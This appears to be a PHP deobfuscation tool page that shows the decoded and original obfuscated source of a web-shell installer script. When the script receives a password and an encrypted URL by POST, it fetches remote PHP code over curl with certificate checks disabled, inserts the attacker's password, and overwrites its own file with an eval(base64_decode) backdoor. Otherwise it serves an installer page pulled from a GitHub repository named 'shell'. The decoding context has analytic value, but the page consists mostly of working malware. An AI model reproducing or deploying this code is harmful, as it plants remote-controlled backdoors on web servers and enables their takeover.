Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /* Don't change anything otherwise this code does not work. ..........Devel..
Decoded Output download
<?php
/*
Don't change anything otherwise this code does not work.
..........Developer...........
. .
. *** Samiul Alim *** .
. [email protected] .
. fb : samiul.alim.1230 .
. tg : samiulalim1230 .
. .
..............................
Copyright 2023
*/
goto SEcN6;
J5Ux5:
function createFileFopen($file, $data)
{
$fileHandle = fopen($file, "w");
if ($fileHandle === false) {
return false;
} else {
$bytesWritten = fwrite($fileHandle, $data);
fclose($fileHandle);
if ($bytesWritten !== false) {
return true;
} else {
return false;
}
}
}
goto SoP_E;
oGV0N:
$mr999plus = str_replace("\", "/", __DIR__) . "/" . basename(__FILE__);
goto RdDrx;
MWZ3b:
function string_to_octal($str)
{
$rtn = '';
$chars = str_split($str);
foreach ($chars as $c) {
$rtn .= "\" . str_pad(base_convert(ord($c), 10, 8), 3, 0, STR_PAD_LEFT);
}
return $rtn;
}
goto J5Ux5;
RdDrx:
function getDecode($encode)
{
$key = "SamiulAlim";
$chiper = "AES-128-CTR";
$iv = hex2bin("2c269a65037c190f4994f11c0f1e37c0");
return openssl_decrypt($encode, $chiper, $key, 0, $iv);
}
goto ZWtfo;
ZWtfo:
function getContent($url)
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_HTTPHEADER, array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"));
$output = curl_exec($curl);
curl_close($curl);
return $output;
}
goto MWZ3b;
SoP_E:
if (isset($_POST["password"], $_POST["version"], $_POST["colour"])) {
$password = string_to_octal($_POST["password"]);
$version = explode("|SHELL|", getDecode($_POST["version"]));
$php = getContent($version[0]);
$index = string_to_octal($version[1]);
$script = string_to_octal($version[2]);
$style = string_to_octal(getDecode($_POST["colour"]));
if ($php == '') {
$result["success"] = false;
$result["msg"] = "Install failed!";
} else {
$install = "<?php eval(base64_decode('" . base64_encode(str_replace("|HACKER|", $password, str_replace("|SCRIPT|", $script, str_replace("|STYLE|", $style, str_replace("|INDEX|", $index, $php))))) . "')); ?>";
if (createFileFopen($mr999plus, $install)) {
$result["success"] = true;
} else {
if (file_get_contents($mr999plus, $install)) {
$result["success"] = true;
$result["msg"] = "Installed successfully!";
} else {
$result["success"] = false;
$result["msg"] = "Install permission denied!";
}
}
}
header("Content-Type: application/json; charset=utf-8");
die(json_encode($result));
} else {
echo getContent("https://github.com/samiulalim1/shell/raw/main/install/index.html");
}
goto LTYUP;
SEcN6:
error_reporting(0);
goto oGV0N;
LTYUP:
?>
Did this file decode correctly?
Original Code
<?php
/*
Don't change anything otherwise this code does not work.
..........Developer...........
. .
. *** Samiul Alim *** .
. [email protected] .
. fb : samiul.alim.1230 .
. tg : samiulalim1230 .
. .
..............................
Copyright 2023
*/
goto SEcN6;
J5Ux5:
function createFileFopen($file, $data)
{
$fileHandle = fopen($file, "\167");
if ($fileHandle === false) {
return false;
} else {
$bytesWritten = fwrite($fileHandle, $data);
fclose($fileHandle);
if ($bytesWritten !== false) {
return true;
} else {
return false;
}
}
}
goto SoP_E;
oGV0N:
$mr999plus = str_replace("\x5c", "\57", __DIR__) . "\x2f" . basename(__FILE__);
goto RdDrx;
MWZ3b:
function string_to_octal($str)
{
$rtn = '';
$chars = str_split($str);
foreach ($chars as $c) {
$rtn .= "\134" . str_pad(base_convert(ord($c), 10, 8), 3, 0, STR_PAD_LEFT);
}
return $rtn;
}
goto J5Ux5;
RdDrx:
function getDecode($encode)
{
$key = "\123\x61\155\x69\x75\154\101\154\151\x6d";
$chiper = "\101\105\x53\55\61\62\x38\x2d\x43\124\122";
$iv = hex2bin("\x32\x63\62\66\71\x61\x36\x35\x30\63\67\x63\x31\71\60\146\64\71\71\64\146\61\61\143\x30\146\x31\x65\63\x37\143\x30");
return openssl_decrypt($encode, $chiper, $key, 0, $iv);
}
goto ZWtfo;
ZWtfo:
function getContent($url)
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_HTTPHEADER, array("\125\163\x65\162\55\101\x67\x65\x6e\x74\72\40\x4d\x6f\x7a\x69\x6c\154\141\57\x35\x2e\x30\40\50\127\x69\156\x64\157\167\163\40\x4e\x54\x20\x31\60\56\60\73\40\x57\x69\x6e\x36\64\x3b\x20\170\x36\x34\51\40\x41\160\160\154\x65\x57\x65\142\x4b\151\x74\x2f\x35\x33\67\x2e\63\66\40\x28\x4b\110\124\115\114\x2c\40\x6c\x69\153\x65\40\x47\145\143\x6b\157\51\40\x43\x68\162\157\155\x65\57\61\x31\65\56\60\x2e\x30\x2e\x30\x20\x53\x61\x66\141\162\151\57\x35\63\x37\x2e\63\x36"));
$output = curl_exec($curl);
curl_close($curl);
return $output;
}
goto MWZ3b;
SoP_E:
if (isset($_POST["\x70\141\x73\163\x77\x6f\x72\x64"], $_POST["\166\145\x72\163\151\157\x6e"], $_POST["\x63\157\154\157\x75\162"])) {
$password = string_to_octal($_POST["\x70\x61\x73\163\x77\157\162\144"]);
$version = explode("\174\123\110\105\114\114\174", getDecode($_POST["\166\x65\162\x73\x69\x6f\156"]));
$php = getContent($version[0]);
$index = string_to_octal($version[1]);
$script = string_to_octal($version[2]);
$style = string_to_octal(getDecode($_POST["\x63\x6f\154\x6f\165\162"]));
if ($php == '') {
$result["\x73\165\143\x63\145\x73\163"] = false;
$result["\x6d\x73\x67"] = "\111\156\x73\164\141\x6c\154\40\146\141\x69\154\145\x64\41";
} else {
$install = "\74\77\160\x68\x70\40\x65\166\x61\x6c\50\x62\x61\163\145\66\64\137\x64\x65\143\x6f\x64\145\x28\x27" . base64_encode(str_replace("\174\110\x41\x43\113\x45\x52\x7c", $password, str_replace("\x7c\x53\103\x52\x49\x50\x54\x7c", $script, str_replace("\x7c\x53\x54\x59\x4c\x45\x7c", $style, str_replace("\174\x49\x4e\x44\105\130\174", $index, $php))))) . "\x27\x29\x29\x3b\x20\x3f\x3e";
if (createFileFopen($mr999plus, $install)) {
$result["\163\x75\x63\x63\145\163\x73"] = true;
} else {
if (file_get_contents($mr999plus, $install)) {
$result["\x73\x75\143\143\145\x73\x73"] = true;
$result["\155\x73\147"] = "\111\x6e\163\164\141\154\154\145\x64\40\163\165\x63\143\145\163\163\x66\x75\154\x6c\x79\41";
} else {
$result["\163\165\143\x63\145\163\163"] = false;
$result["\x6d\x73\147"] = "\111\156\x73\164\141\154\x6c\40\x70\145\162\x6d\x69\x73\x73\x69\x6f\156\x20\144\145\156\151\145\144\41";
}
}
}
header("\x43\x6f\x6e\x74\x65\x6e\x74\55\x54\x79\160\x65\72\40\x61\160\x70\154\x69\143\x61\164\x69\157\156\x2f\x6a\163\157\156\x3b\40\143\x68\141\x72\163\x65\x74\75\x75\164\x66\x2d\70");
die(json_encode($result));
} else {
echo getContent("\x68\164\164\x70\x73\x3a\x2f\57\147\x69\164\150\x75\142\56\143\x6f\155\57\163\141\155\151\165\x6c\141\x6c\151\x6d\61\x2f\163\150\145\154\154\57\162\x61\x77\x2f\155\141\151\x6e\x2f\x69\156\163\x74\x61\x6c\154\57\151\156\x64\145\170\x2e\150\x74\x6d\x6c");
}
goto LTYUP;
SEcN6:
error_reporting(0);
goto oGV0N;
LTYUP:
Function Calls
None |
Stats
MD5 | ec83f5b6683265f01572de1da450fb98 |
Eval Count | 0 |
Decode Time | 54 ms |